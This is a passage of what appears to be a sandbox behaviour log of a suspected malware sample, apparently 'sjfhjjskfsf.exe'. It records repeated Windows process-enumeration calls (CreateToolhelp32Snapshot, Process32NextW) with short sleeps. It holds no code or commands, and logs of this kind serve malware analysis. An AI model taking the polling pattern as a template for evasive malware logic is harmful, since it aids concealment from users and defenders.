lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.940] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.940] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.940] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.941] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.941] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.941] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.942] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.942] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0210.942] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.942] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.943] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.943] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.943] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.944] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0210.944] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0210.944] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0210.945] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0210.945] Sleep (dwMilliseconds=0x64) [0211.135] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11c [0211.170] Process32FirstW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.170] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.170] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.171] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.171] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.171] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.172] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.172] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.172] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.172] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.173] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.173] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.173] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.174] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.174] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.174] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.174] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.175] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.175] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0211.175] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.176] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.176] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.176] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.177] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.177] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0211.177] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0211.178] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.178] Process32NextW (in: hSnapshot=0x11c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0211.178] Sleep (dwMilliseconds=0x64) [0211.315] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0211.317] Process32FirstW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.317] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.317] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.318] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.318] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.318] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.319] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.319] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.319] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.320] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.320] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.320] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.321] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.321] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.321] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.322] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.322] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.322] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.323] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0211.323] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.323] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.324] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.324] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.324] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.324] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0211.325] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0211.325] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.325] Process32NextW (in: hSnapshot=0x120, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0211.326] Sleep (dwMilliseconds=0x64) [0211.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x124 [0211.573] Process32FirstW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.574] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.574] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.574] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.575] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.575] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.575] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.576] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.576] Process32NextW (in: hSnapshot=0x124, 